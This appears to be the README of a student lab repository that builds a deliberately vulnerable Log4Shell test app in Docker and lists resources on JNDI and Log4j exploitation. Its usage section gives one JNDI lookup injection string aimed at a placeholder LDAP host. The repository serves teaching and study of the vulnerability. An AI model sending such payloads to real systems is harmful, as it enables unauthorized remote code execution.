Log4Shell
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

40 lines
1.7 KiB

# SR2I203
Log4Shell
[notes](https://notes.rezel.net/57oTyTczRT28NtWlk8NQ9Q#)
## Usage
To run this app, you need to install docker, then run :
docker build -t app .
docker run app my-arg
For example you can now try to inject some jndi script:
docker run app '${jndi:ldap://my-ldap/}'
### Overview Resources
* [Base repo](https://github.com/ammrat13/log4shell-test)
* [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w):
* [Overview](https://www.youtube.com/watch?v=w2F67LbEtnk)
* [Internals](https://www.youtube.com/watch?v=iI9Dz3zN4d8)
* [*A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land*](https://www.youtube.com/watch?v=Y8a5nB-vy78)
* [Flow Diagram](https://www.radware.com/security/threat-advisories-and-attack-reports/log4shell-critical-log4j-vulnerability/)
* [Impact](https://www.lunasec.io/docs/blog/log4j-zero-day/)
### JNDI Resources
* [Tutorial](https://docs.oracle.com/javase/jndi/tutorial/):
* [Tutorial: How Java Objects are Stored](https://docs.oracle.com/javase/jndi/tutorial/objects/index.html)
* [Technotes](https://docs.oracle.com/javase/8/docs/technotes/guides/jndi/):
* [LDAP](https://docs.oracle.com/javase/8/docs/technotes/guides/jndi/jndi-ldap.html)
* [RMI](https://docs.oracle.com/javase/7/docs/technotes/guides/jndi/jndi-rmi.html)
* [Java Documentation](https://docs.oracle.com/javase/8/docs/api/):
* [`DirContext`](https://docs.oracle.com/javase/8/docs/api/javax/naming/directory/DirContext.html)
* [`Reference`](https://docs.oracle.com/javase/8/docs/api/javax/naming/Reference.html)
* [`ObjectFactory`](https://docs.oracle.com/javase/8/docs/api/javax/naming/spi/ObjectFactory.html)
* [RFC 2713](https://datatracker.ietf.org/doc/html/rfc2713)